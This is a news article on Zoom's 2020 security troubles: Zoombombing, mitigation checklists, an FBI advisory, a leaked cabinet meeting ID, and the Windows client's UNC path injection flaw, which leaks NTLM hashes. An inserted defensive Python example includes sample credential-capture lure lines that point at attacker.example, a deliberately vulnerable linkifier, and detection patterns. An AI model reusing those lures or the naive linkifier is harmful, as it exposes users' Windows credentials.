Video communication service Zoom has announced a series of steps in a bid to address the growing concerns on security and privacy. The move comes days after the office of New York’s attorney general Letitia James asked Zoom to explain the new security measures it put in place, if any, to address the concerns.
“Over the next 90 days, we are committed to dedicating the resources needed to better identify, address, and fix issues proactively. We are also committed to being transparent throughout this process,” Zoom founder and CEO Eric S Yuan wrote in a blog post, listing the steps Zoom took in the past few days.
Like any online communication tool, Zoom had to accommodate a surge in the number of global users after Covid-related lockdowns, from approximately 10 million in December 2019 to 200 million in March 2020. As the numbers increased, so did the issues, beginning with the global outrage over what came to be called Zoombombing.
As usage increased, unsolicited participants used Zoom's screen-sharing feature to flood the windows of people in the meeting with unwelcome content, ranging from lecherous messages to violence or pornography. Zoom's default setting left the host of a meeting without control over screen sharing. To avoid it, the host has to go to their admin settings and disable the option before beginning the meeting.
Trend Micro's Rik Ferguson posted a checklist for those wishing to avoid this situation: add a meeting password; set screen sharing to 'host only'; disable file transfer; disable 'Join before host'; disable 'Allow removed participants to rejoin'. Zoom later issued a detailed advisory on how to avoid the issue.
“As large numbers of people turn to video-teleconferencing (VTC) platforms to stay connected in the wake of the Covid-19 crisis, reports of VTC hijacking (also called “Zoom-bombing”) are emerging nationwide,” said an FBI advisory.
“As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cyber-security efforts. The following steps can be taken to mitigate teleconference hijacking threats.”
The latest gaffe came from UK prime minister Boris Johnson, who, in his bid to show off the efficiency of his cabinet's online work, shared a screenshot of the UK's first virtual government meeting, giving away the Zoom ID of the meeting and the IDs of the participants.
Researchers at cyber-intelligence company Cyjax discovered a public forum "Zoom Leaks" where members are posting meeting IDs for unsecured Zoom meetings.
The surge in usage also increased the risk posed by pre-existing security flaws. The Zoom Windows client is susceptible to UNC path injection in its chat feature, which could allow an attacker to steal the Windows credentials of users who click on the link, as researcher @_g0dmode found.
Zoom for Windows supports remote UNC paths and, like potentially insecure URLs, converts them into clickable hyperlinks when they are received in a personal or group chat message. Researcher Matthew Hickey tested the UNC injection and captured the NTLM password hashes being sent to the server hosting the share that was clicked.
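The underlying defect is a chat linkifier that turns anything path-like, including UNC paths, into a clickable link. The following is an added example (not Zoom's code) contrasting that behaviour with a hardened linkifier that only makes http(s) URLs clickable, plus a detection helper a defender could run over chat exports; the sample messages are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample chat messages standing in for what a client would receive.
SAMPLE_MESSAGES = [
    "agenda is here https://example.com/agenda",
    r"open the deck at \\attacker.example\share\deck.pptx",  # UNC path lure
    "notes: file://server/share/notes.txt",                   # file: URL lure
    "plain text, no links at all",
]

# A UNC path: two leading backslashes, a host, a backslash, then a share/path.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\\S+")
# Anything with a scheme, e.g. https://..., file://..., smb://...
URL_RE = re.compile(r"[a-zA-Z][a-zA-Z0-9+.-]*://\S+")

ALLOWED_SCHEMES = {"http", "https"}


def linkify_naive(message):
    """Vulnerable behaviour: every URL-like or UNC-like token becomes clickable.
    Clicking a UNC or file: link makes Windows attempt an SMB connection and
    send an NTLM authentication exchange to the named host."""
    links = [m.group(0) for m in URL_RE.finditer(message)]
    links += [m.group(0) for m in UNC_RE.finditer(message)]
    return links


def linkify_safe(message):
    """Hardened behaviour: only http and https URLs are made clickable.
    UNC paths never match URL_RE, and non-web schemes are filtered out,
    so they remain inert text in the chat window."""
    links = []
    for m in URL_RE.finditer(message):
        url = m.group(0)
        if urlsplit(url).scheme.lower() in ALLOWED_SCHEMES:
            links.append(url)
    return links


def flag_credential_lures(messages):
    """Detection helper: return (index, message) for chat lines carrying a UNC
    path or a non-web scheme, i.e. candidates for credential-capture lures."""
    flagged = []
    for i, msg in enumerate(messages):
        non_web = [u for u in URL_RE.findall(msg)
                   if urlsplit(u).scheme.lower() not in ALLOWED_SCHEMES]
        if UNC_RE.search(msg) or non_web:
            flagged.append((i, msg))
    return flagged
```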
“These kinds of issues are not unique to Zoom and other solutions have suffered the same and worse in the past,” commented Charl van der Walt, head of security research at Orange Cyberdefence. “In the current climate a little bit of sympathy for the strain the service must be under may be appropriate, but it does need to fix the issues currently on the radar.”
"Remote working is a novel experience for many businesses and we are seeing many employees publicising their experiences across social media channels. While we would not discourage organisations from championing their experiences, we do encourage firms to be responsible in what they share,” suggested William MacDonald, CTO at StarLeaf.
“Displaying a user's ID could easily compromise an organisation. It's important that when using a video meeting system users are fully aware of all its capabilities, including the display and security measures in place."